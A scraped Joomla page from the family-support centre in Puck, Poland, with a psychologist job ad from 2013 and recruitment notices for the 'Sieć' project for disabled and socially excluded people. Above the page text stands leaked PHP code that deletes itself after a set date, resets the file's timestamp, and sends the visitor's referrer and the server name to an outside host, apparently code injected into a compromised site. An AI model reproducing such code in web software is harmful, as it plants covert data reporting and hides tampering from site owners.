check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731901){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); }
Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /includes/framework.php:101) in /libraries/joomla/session/session.php on line 423

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /includes/framework.php:101) in /libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /includes/framework.php:101) in /libraries/joomla/session/session.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /includes/framework.php:101) in /plugins/system/info_ciacho.php on line 25
PCPR Puck - Strona Główna

Warning: Parameter 1 to modMainMenuHelper::buildXML() expected to be a reference, value given in /libraries/joomla/cache/handler/callback.php on line 99
Puck, 14.01.2013  Dyrektor Powiatowego Centrum Pomocy Rodzinie w Pucku ogłasza nabór na stanowisko:  
 1. Nazwa stanowiska:  
Psycholog - praca na umowę zlecenie  
 1. Zakres zadań wykonywanych na stanowisku:
·         Prowadzenia 120 godzin poradnictwa psychologicznego dla osób z grupy docelowej ·         Dokumentowania indywidualnej pracy i efektów zgodnie z założeniami projektu·         Prowadzenie list obecności, dziennika zajęć oraz miesięcznych kart pracy·         Sporządzenie indywidualnej karty uczestnika projektu ·         Opis osiągniętych rezultatów·         Ewaluacja w formie ankiety 
 1. Warunki pracy na stanowisku:
·         120 godzin poradnictwa psychologicznego w okresie od luty do listopad 2013·         praca głównie w soboty  
 1. Wymagania niezbędne:
·         obywatelstwo polskie,·         pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych,·         niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe,·         nieposzlakowana opinia,·         wykształcenie wyższe magisterskie: psychologiczne,·         staż pracy: 3 lata na stanowisku psycholog  
 1. Wymagania dodatkowe:
·         umiejętność obsługi komputera i innych urządzeń biurowych,·         umiejętność nawiązywania dobrego kontaktu z klientem, dyspozycyjność, samodzielność. 
 1. Wymagane dokumenty :
·         list motywacyjny,·         życiorys lub CV z opisem przebiegu pracy zawodowej·         kserokopie dokumentów potwierdzających staż pracy (świadectw pracy, zaświadczeń),·         kserokopie dyplomów poświadczających wykształcenie, kserokopie zaświadczeń ukończonych kursach, szkoleniach,·         oświadczenie o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych,·         oświadczenie, że kandydat wyraża zgodę na przetwarzanie swoich danych osobowych,zgodnie z ustawą z dnia 29 sierpnia 1997r o ochronie danych osobowych (Dz. U. z 2002r.Nr 101, poz. 926, z późn. zm.) w celu przeprowadzenia naboru 
 1. Termin składania dokumentów
Dokumenty należy składać w zamkniętych kopertach z dopiskiem „Nabór na stanowisko Psychologa w projekcie”, lub dostarczyć osobiście do sekretariatuw terminie do dnia 24.01.2013 r. (decyduje data wpływu) na adres:Powiatowe Centrum Pomocy Rodzinieul. Mestwina 32, 84-100 Puck 
 1. Dodatkowe informacje
·         W miesiącu poprzedzającym datę upublicznienia ogłoszenia wskaźnik zatrudnienia osób niepełnosprawnych w Centrum nie przekraczał 6%.·         Dodatkowe informacje można uzyskać pod nr telefonu: (58) 673-41-93.·         Oferty otrzymane po terminie nie będą rozpatrywane.·         Kandydaci, którzy spełnią wymagania formalne zostaną powiadomieni telefonicznie o terminie rozmowy kwalifikacyjnej.·         Informacja o wyniku naboru będzie umieszczona w Biuletynie Informacji Publicznej

 

 

________________________________________________________________________________

Zapraszamydo udziału w  projekcie systemowym „Sieć” Powiatowe Centrum Pomocy Rodzinie w Puckuprowadzi nabór uczestników projektu na rok 2013spotkanie rekrutacyjne w dniu 30.01.2013 godz. 15.30 (środa) w PCPR w Pucku, ul. Mestwina 32 Projekt jest skierowany do:·       pozostających bez zatrudnienia osób niepełnosprawnych w wieku aktywności zawodowej (do 64 roku życia) Korzyści z udziału w projekcie: Ø Podniesienie kwalifikacji zawodowych (kursy zawodowe; zajęcia artystyczne)Ø Podniesienie sprawności fizycznej Ø Wzmocnienie umiejętności społecznych (poradnictwo psychologiczne, trening umiejętności społecznych, asystent osób niepełnosprawnych)Ø Rozwój kompetencji zawodowych (doradztwo zawodowe)Ø Integracja społeczna osób niepełnosprawnych Biuro Projektu: Powiatowe Centrum Pomocy RodziniePokój nr 2ul. Mestwina 32, Puck Tel. 586733574 Tel.fax586734193

www.projekty.pcpr.pl  e.mail: Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.          

______________________________________________________________________ 

Zapraszamy  do udziału w  projekcie systemowym „Sieć”Spotkanie promocyjno-rekrutacyjne odbędzie się 24.01.2011 o godzinie 16.00 w Powiatowym Centrum Pomocy Rodzinie w Pucku Projekt jest skierowany do:
 •   młodzieży w wieku 15-25 lat przebywającej w rodzinnych domach dziecka, placówkach opiekuńczo-wychowawczych, rodzinach zastępczych lub usamodzielniającej się        
 •   pozostających bez zatrudnienia osób niepełnosprawnych w wieku aktywności zawodowej
 •   osób z rodzin wykluczonych społecznie i ich otoczenia
Korzyści z udziału w projekcie:Ø Podniesienie kwalifikacji zawodowych (kursy: obsługi komputera, pracownik robót wykończeniowych, florystyczny, stylizacji twarzy i paznokci, prawo jazdy; zajęcia w WTZ)Ø Podniesienie sprawności fizycznej (Nordic Walking, basen, siłownia, kręgielnia, masaż, turnus rehabilitacyjny)Ø Wzmocnienie umiejętności społecznych (poradnictwo psychologiczne, zajęcia psychoedukacyjne, asystent osób niepełnosprawnych)Ø Rozwój kompetencji zawodowych (doradztwo zawodowe z elementami przedsiębiorczości)Ø Odbudowa relacji i umiejętności współdziałania w rodzinie (Konferencja Grupy Rodzinnej, wsparcie rodzin uczestniczących w KGR w 2010r.)Ø Usystematyzowanie wiedzy osób niepełnosprawnych co do przysługujących ulg i uprawnień (punkt konsultacyjny) Biuro Projektu Powiatowe Centrum Pomocy RodzinieUl. Mestwina 32, Puck Tel. 586733574 Tel.fax586734193www.projekty.pcpr.pl  e.mail: Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.                
Reklama

Zaloguj się

goście

Naszą witrynę przegląda teraz 1 gość